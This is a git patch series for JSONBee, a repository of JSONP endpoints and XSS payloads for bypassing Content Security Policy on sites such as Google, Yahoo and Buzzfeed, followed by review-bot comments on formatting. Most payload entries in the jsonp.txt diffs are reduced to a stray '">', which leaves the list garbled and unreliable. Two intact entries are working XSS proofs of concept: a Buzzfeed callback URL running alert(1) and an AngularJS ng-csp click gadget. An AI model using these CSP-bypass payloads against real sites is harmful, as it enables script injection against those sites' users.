From d97ffd2eecadae58db80121efc5a100f557f87fa Mon Sep 17 00:00:00 2001 From: zigoo0 Date: Fri, 11 Jan 2019 09:22:15 +0100 Subject: [PATCH 01/11] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5d80108..86ff68f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # JSONBee A ready to use JSONP endpoints to help bypass content security policy of different websites. -The tool was presented during HackIT 2018 in Keiv. The presentation can be found here (not sure why format of the slides is screwed :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy +The tool was presented during HackIT 2018 in Kiev. The presentation can be found here (not sure why format of the slides is screwed :D): https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy # What is JSONBee? From 46231e2ff97b4ee29ea3279599ee2195e6c349c7 Mon Sep 17 00:00:00 2001 From: zigoo0 Date: Fri, 11 Jan 2019 09:23:52 +0100 Subject: [PATCH 02/11] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 86ff68f..0ff0c34 100644 --- a/README.md +++ b/README.md 
@@ -5,7 +5,7 @@ The tool was presented during HackIT 2018 in Kiev. The presentation can be found # What is JSONBee? -The main idea behind this tool is to find the JSONP endpoint(s) that would help you bypass content security policy for your target website in an automated way. JSONBee takes an input of a url name (i.e. https://www.facebook.com), parses the CSP (Content-Security Policy), and automatically suggest the XSS payload that would bypass the CSP. It mainly focuses on JSONP endpoints gathered during my bug bounty hunting activities, and could be used to bypass the CSP. +The main idea behind this tool is to find the JSONP endpoint(s) that would help you bypass content security policy for your target website in an automated way. JSONBee takes an input of a url name (i.e. https://www.facebook.com), parses the CSP (Content-Security-Policy), and automatically suggest the XSS payload that would bypass the CSP. It mainly focuses on JSONP endpoints gathered during my bug bounty hunting activities, and could be used to bypass the CSP. JSONBee relies on 3 methods to gather the JSONP endpoints: * The repository within this project; From 80626ed5e7455753489cd444cd8dd9595abff51d Mon Sep 17 00:00:00 2001 From: zigoo0 Date: Sun, 10 Feb 2019 20:17:03 +0100 Subject: [PATCH 03/11] Update jsonp.txt Added a new Yahoo CB URL --- jsonp.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/jsonp.txt b/jsonp.txt index 58ec2fa..84743b7 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -28,6 +28,7 @@ "> "> "> +">x "> "> "> From 36c72ba47c156f11eed2ff42b402bd9ced763f38 Mon Sep 17 00:00:00 2001 From: zigoo0 Date: Sun, 15 Sep 2019 01:42:18 +0200 Subject: [PATCH 04/11] Adding www.google.com to the list --- jsonp.txt | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/jsonp.txt b/jsonp.txt index 84743b7..0e089cc 100644 --- a/jsonp.txt +++ b/jsonp.txt 
@@ -1,18 +1,19 @@ #Google.com: -"> -"> -"> -"> +"> +"> +"> +"> +"> #Blogger.com: -"> +"> #Yandex: -"> -"> +"> +"> #VK.com: -"> +"> #Marketo.com -"> -"> +"> +"> #AlibabaGroup: "> "> From cbfa3314080e9cea7278be51dbab9f50de44af0e Mon Sep 17 00:00:00 2001 From: Ebrahem Hegazy Date: Tue, 22 Oct 2019 22:12:35 +0200 Subject: [PATCH 05/11] Adding Yahoo.com Adding Yahoo.com --- jsonp.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/jsonp.txt b/jsonp.txt index 0e089cc..30379b2 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -30,6 +30,7 @@ "> "> ">x +"> "> "> "> From e353ccaa613911164343ef569364da3b5fd70189 Mon Sep 17 00:00:00 2001 From: Ebrahem Hegazy Date: Mon, 28 Oct 2019 14:34:58 +0100 Subject: [PATCH 06/11] Added Buzzfeed.com Added Buzzfeed.com --- jsonp.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/jsonp.txt b/jsonp.txt index 30379b2..19dbbfb 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -24,6 +24,8 @@ "> #Uber.com: "> +#Buzzfeed.com +https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f #AOL/Yahoo "> "> From 1a518ddf695ae3093ff637c5958802715e890d88 Mon Sep 17 00:00:00 2001 From: Ebrahem Hegazy Date: Tue, 5 Nov 2019 14:38:35 +0100 Subject: [PATCH 07/11] Adding Yahoo JP Adding Yahoo JP --- jsonp.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/jsonp.txt b/jsonp.txt index 19dbbfb..7d74370 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -25,7 +25,10 @@ #Uber.com: "> #Buzzfeed.com -https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f +"> +#Yahoo JP (Thanks to @nizam0906) +"> +"> #AOL/Yahoo "> "> From d11db66d9dff0f0844c40567fc6c42af5e00fdd9 Mon Sep 17 00:00:00 2001 From: Ebrahem Hegazy Date: Wed, 23 Feb 2022 12:01:11 +0200 Subject: [PATCH 08/11] Removing a patched app --- jsonp.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/jsonp.txt b/jsonp.txt index 7d74370..4ac7018 100644 --- a/jsonp.txt +++ b/jsonp.txt 
@@ -49,7 +49,6 @@ "> "> "> -"> "> "> "> From e106db204fdc436be9f9913c2a5b5b62b6f6af22 Mon Sep 17 00:00:00 2001 From: Ebrahem Hegazy Date: Wed, 23 Feb 2022 12:02:22 +0200 Subject: [PATCH 09/11] JSONP endpoints and payloads --- jsonp.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jsonp.txt b/jsonp.txt index 4ac7018..17493f5 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -55,7 +55,7 @@ "> "> "> -#GoogleAPI's +#Google API's "> "> ng-app"ng-csp ng-click=$event.view.alert(1337)> From 332486bea44697a22307a0f2618babdb8aaefbe8 Mon Sep 17 00:00:00 2001 From: PinkDraconian Date: Tue, 3 Oct 2023 15:02:51 +0200 Subject: [PATCH 10/11] Added translate.googleapis.com Added a JSONP endpoint for translate.googleapis.com --- jsonp.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/jsonp.txt b/jsonp.txt index 17493f5..86a7dc9 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -59,3 +59,4 @@ "> "> ng-app"ng-csp ng-click=$event.view.alert(1337)> +"> From e5b3728b1bb20ac2b10d35ca9798f099ef473f9b Mon Sep 17 00:00:00 2001 From: Maltemo Date: Thu, 5 Oct 2023 11:51:43 +0200 Subject: [PATCH 11/11] Adding maps.googleapis.com endpoint --- jsonp.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/jsonp.txt b/jsonp.txt index 17493f5..d795c72 100644 --- a/jsonp.txt +++ b/jsonp.txt @@ -4,6 +4,7 @@ "> "> "> +"> #Blogger.com: "> #Yandex:
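Review bot: in PATCH 02/11 the rewritten paragraph under "# What is JSONBee?" corrects only the header name to "Content-Security-Policy"; the same line still has "i.e. https://www.facebook.com" where an example ("e.g.") is meant, "a url name" for "a URL", and "automatically suggest" for "suggests". The line is being touched anyway, so fix these in the same change, and squash it with PATCH 01/11: both are one-line README edits with the identical subject "Update README.md", made under two minutes apart.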
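Review bot: the line added in PATCH 03/11 ends in a trailing "x" (+">x) while every neighbouring entry in that hunk ends at the closing quote and bracket. Confirm whether the "x" is part of the entry or a typo, since jsonp.txt is the repository the README says the tool reads from. The commit message "Added a new Yahoo CB URL" also gives no section, and the hunk shows no header near line 28; say which section the entry belongs to.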
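Review bot: PATCH 04/11 is titled "Adding www.google.com to the list" but its single hunk (11 insertions, 10 deletions) also rewrites the entries under #Blogger.com:, #Yandex:, #VK.com: and #Marketo.com, none of which the message mentions. Either split the Google addition from the rewrite of the other sections or describe in the message what changed in those nine other lines and why. While here, #Marketo.com is the only header in the hunk without a trailing colon.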
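Review bot: the Buzzfeed entry added in PATCH 06/11 is a bare URL, unlike every other entry in the file, which starts with "> as the surrounding context lines show, and the new header "#Buzzfeed.com" lacks the trailing colon used by "#Uber.com:" directly above it. Add the entry in the same form as the rest of jsonp.txt so that anything reading the file line by line sees one consistent format.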
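Review bot: PATCH 07/11 is described as "Adding Yahoo JP", yet the first change in the hunk deletes the Buzzfeed URL from PATCH 06/11 and replaces it with a different line; that correction is not mentioned anywhere in the message. Put the Buzzfeed fix in its own commit (or fold it into 06/11). The credit in the header "#Yahoo JP (Thanks to @nizam0906)" would also be better placed in the commit message or README, so that section headers stay plain names like the others.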
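Review bot: PATCH 08/11 removes one entry at line 52 with the message "Removing a patched app", and neither the message nor the hunk context (no section header is in view) says which application or endpoint was fixed. Name the host in the commit message; a record of which endpoints have been patched is useful to site owners checking whether their CSP allow-list still includes a host that used to be on this list.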
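Review bot: the subject of PATCH 09/11, "JSONP endpoints and payloads", does not match the change, which only renames the header "#GoogleAPI's" to "#Google API's". The new header keeps the stray apostrophe (the plural is "APIs") and still lacks the trailing colon used by "#Google.com:" and "#Blogger.com:". Suggest "#Google APIs:" and a subject that says it is a header rename.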
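Review bot: PATCH 11/11 is diffed against the same pre-image as PATCH 10/11 ("index 17493f5..d795c72" versus "index 17493f5..86a7dc9"), so the series is not linear as numbered; rebase 11/11 onto the result of 10/11 so the index lines chain. The maps.googleapis.com entry is also inserted at line 7, inside the "#Google.com:" section just above "#Blogger.com:", whereas 10/11 put translate.googleapis.com at the end of the file under "#Google API's". Move the new line to that section so both googleapis.com hosts sit together.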